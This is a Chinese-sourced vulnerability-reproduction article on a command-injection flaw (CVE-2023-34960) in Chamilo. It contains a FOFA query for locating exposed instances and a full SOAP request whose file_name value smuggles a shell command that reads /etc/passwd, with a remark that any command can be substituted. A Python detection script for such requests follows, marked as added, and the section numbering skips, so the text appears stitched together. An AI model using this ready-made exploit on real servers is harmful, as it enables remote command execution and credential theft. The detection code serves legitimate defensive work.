Command Execution Vulnerability in Chamilo Learning Management Software (CVE-2023-34960)
Disclaimer: Do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article shall be borne by the user himself. Adverse consequences have nothing to do with the article author. This article is for educational purposes only.
1. Introduction to Chamilo Learning Management Software
This article was first published on the Nanfeng Vulnerability Reappearance Library WeChat official account.
Chamilo is a free downloadable learning management software that aims to improve the accessibility of online courses for users from disadvantaged backgrounds. Chamilo is run and managed by a non-profit organization called the Chamilo Association.
2. Vulnerability description
Chamilo contains a command execution vulnerability: an attacker can execute arbitrary commands on the server by sending a crafted XML document.
CVE number: CVE-2023-34960
CNNVD number:
CNVD number:
3. Affected versions
Chamilo
4. FOFA query statement
app="Chamilo"
5. Vulnerability reproduction
Vulnerable URL: https://www.xxx.com/main/webservices/additional_webservices.php
Request packet:
POST /main/webservices/additional_webservices.php HTTP/1.1
Host: www.xxx.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
Content-Length: 826
Content-Type: application/x-www-form-urlencoded

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{http://ip:port}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type="ns2:Map"><item><key xsi:type="xsd:string">file_data</key><value xsi:type="xsd:string"></value></item><item><key xsi:type="xsd:string">file_name</key><value xsi:type="xsd:string">`{}`.pptx'|" |cat /etc/passwd||a #</value></item><item><key xsi:type="xsd:string">service_ppt2lp_size</key><value xsi:type="xsd:string">720x540</value></item></param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope>
The request above executes the cat /etc/passwd command on the server; the command in the file_name value can be replaced with any other command.
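A defensive check for the request shown above, added here as an example (not code from the original article or from Chamilo): it parses a POST body sent to additional_webservices.php and reports wsConvertPpt calls whose file_name carries shell metacharacters. The function names, the metacharacter set and the sample envelope are assumptions made for this example.

```python
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

ENDPOINT = "/main/webservices/additional_webservices.php"  # path from the request above
# Assumed rule: a presentation file name never needs shell metacharacters.
SHELL_META = re.compile(r"[`|;&$<>'\"\\\n#(){}]")

def local(tag):
    """Drop the '{namespace}' prefix ElementTree puts on element names."""
    return tag.rsplit("}", 1)[-1]

def inspect_request(path, body):
    """Return findings for one POST; an empty list means nothing matched."""
    if path.split("?", 1)[0] != ENDPOINT:
        return []
    if "<!DOCTYPE" in body or "<!ENTITY" in body:
        # Refuse to parse DTDs: avoids entity-expansion tricks against the checker itself.
        return ["DTD or entity declaration in SOAP body (not parsed)"]
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return ["malformed XML sent to the web-service endpoint"]
    findings = []
    for call in (el for el in root.iter() if local(el.tag) == "wsConvertPpt"):
        for item in call.iter("item"):
            key = (item.findtext("key") or "").strip()
            value = item.findtext("value") or ""
            if key == "file_name" and SHELL_META.search(value):
                findings.append(f"shell metacharacters in file_name: {value!r}")
    return findings

def envelope(file_name):
    """Constructed minimal wsConvertPpt call (sample input, not a captured request)."""
    return ('<e:Envelope xmlns:e="http://schemas.xmlsoap.org/soap/envelope/" '
            'xmlns:ns1="urn:example"><e:Body><ns1:wsConvertPpt><param0>'
            "<item><key>file_name</key><value>" + escape(file_name) +
            "</value></item></param0></ns1:wsConvertPpt></e:Body></e:Envelope>")

# file_name value copied from the request on this page
PAGE_VALUE = "`{}`.pptx'|\" |cat /etc/passwd||a #"

if __name__ == "__main__":
    for name in ("lesson 1.pptx", PAGE_VALUE):
        print(repr(name), "->", inspect_request(ENDPOINT, envelope(name)) or "clean")
```

The check can be run over logged or proxied POST bodies; a finding is a signal to alert on or block, and it complements the upgrade rather than replacing it.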
7. Remediation
Upgrade to the latest version or apply the patch.